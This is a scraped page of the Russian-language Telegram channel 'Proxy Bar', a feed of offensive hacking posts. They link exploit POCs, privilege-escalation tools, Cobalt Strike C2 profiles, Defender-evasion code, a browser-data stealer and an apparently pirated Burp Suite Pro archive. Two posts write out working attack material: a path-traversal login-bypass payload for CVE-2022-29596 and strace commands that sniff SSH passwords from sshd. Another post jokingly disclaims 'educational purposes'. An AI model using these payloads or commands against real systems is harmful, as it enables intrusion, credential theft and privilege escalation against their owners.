NEW BOT Телеграм, страница

Proxy Bar

Black Hat 2022 USA/ASIA/Europe
видео
USA
ASIA
EUROPE

👍13🔥2

5.95K views17:44

Proxy Bar

The Defender’s Guide to the Windows Registry
read

#widows #defender #registry

👍5😱1

5.78K views07:13

Proxy Bar

концепция удаления/записи произвольного файла в Sysmon (CVE-2022-41120/CVE-2022-XXXXX)
download POC

#windows #LPE #poc

😱4👍2🔥2

5.45K views11:57

Proxy Bar

Bug Bounty Wordlists
download

👍16🔥3

6.05K views07:17

Proxy Bar

Linux PrivEsc
Злой CRON для самых маленьких - тут

#linux #cron #esc

👍4🔥1😱1

6K views10:33

Proxy Bar

PENTESTING BIBLE

😱5🔥3

5.49K views05:33

Proxy Bar

Random C2 Profile Generator
для cobalt-strike
download

#cobalt

👍8

5.45K views06:04

Proxy Bar

Pentagrid
SMS-шлюз с открытым исходным кодом для пентест проектов
read
install and run

#gsm #gateway #sms #2G/3G/4G/5G

🔥8👍7

5.88K views06:30

Proxy Bar

burpsuite_pro_v2022.12.zip

566.6 MB

Burp Suite PRO version 2022.12.2

👍9😱5🔥2

6.47K views12:58

Proxy Bar

RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
read

👍2🔥2

5.36K views07:51

Proxy Bar

CVE-2022-29596
MicroStrategy Enterprise Manager 2022
обходим аутентификацию, вызывая ошибку входа в систему, а затем вводя:

Uid=/../../../../../../../../../../../windows/win.ini%00.jpg&Pwd=_any_password_&ConnMode=1&3054=Login

#microsoft #bypass

🔥5

5.33K views08:14

Proxy Bar

Получаем пароль от SSH в открытом виде
*
1. получаем точный идентификатор sshd

pgrep -l sshd

2. Отслеживаем системные вызовы

strace -f -p <ssh_PID> -e trace=write -o capture

#ssh #sniff #password

😱16👍9🔥3

6.88K views08:52

Proxy Bar

CVE-2022-2414-POC.zip

1.2 KB

CVE-2022-2414
Дырка в pki-core
уязвимость позволяет удаленному злоумышленнику получить содержимое произвольных файлов, отправив специально созданные HTTP-запросы.

👍4🔥1

5.15K views13:42

Proxy Bar

Defender Exclusions BOF
Хороший пример того, что defender отключать не обязательно, достаточно определить "исключения" ииии воспользоваться ими )))
0_щ

👍7🔥2

5.3K views13:59

Proxy Bar

Forwarded from null

в предложку кстати

GitHub

GitHub - moonD4rk/HackBrowserData: Extract and decrypt browser data, supporting multiple data types, runnable on various operating…

Extract and decrypt browser data, supporting multiple data types, runnable on various operating systems (macOS, Windows, Linux). - moonD4rk/HackBrowserData

🔥9👍2😱2

6.29K views19:56

Proxy Bar

Ну во первых с пятницей.
А во вторых, Я тебя сука по IP вычислю
*
только для образовательных целей (~~нет~~)

#track #ip #deanon

👍6😱6

6.57K views06:44

Proxy Bar

DCOMPotato
Коллекция эксплойтов /повышения привилегий службы DCOM.
*
doownload

#exploit #dcom

👍5

6.34K viewsedited 09:50

Proxy Bar

Перехват системных вызовов в Windows 11 22H2 like Avast Antivirus.
Исследование, анализ и обход.
Learn

#windows #syscall #bypass

👍6🔥5😱2

6.74K views10:00

Proxy Bar

SIEM
SIEM Tactics, Techiques, and Procedures
read

👍8🔥3😱3

5.2K views07:56

Proxy Bar

Пятничная викторина )))

#docker #vuln

👍3

4.56K views03:00

Proxy Bar

DirCreate2System
Получаем

NT AUTHORITY\\SYSTEM

*
Было обнаружено, что comctl32.dll (который отсутствует в системном каталоге, которого на самом деле не существует) можно загрузить через wermgr.exe (отчет об ошибках Windows при запуске schtasks). Это означает, что если мы можем создать папку с именем C:\\windows\\system32\\wermgr.exe.local с ACL с полным доступом, мы сможем захватить comctl32.dll в этих папках. Затем можно этот POC как метод создания каталога для оболочки NT AUTHORITY\\SYSTEM.
*
DOWNLOAD POC

#windows #escpriv #POC #system

👍5

5K views03:11

About

Blog

Apps

Platform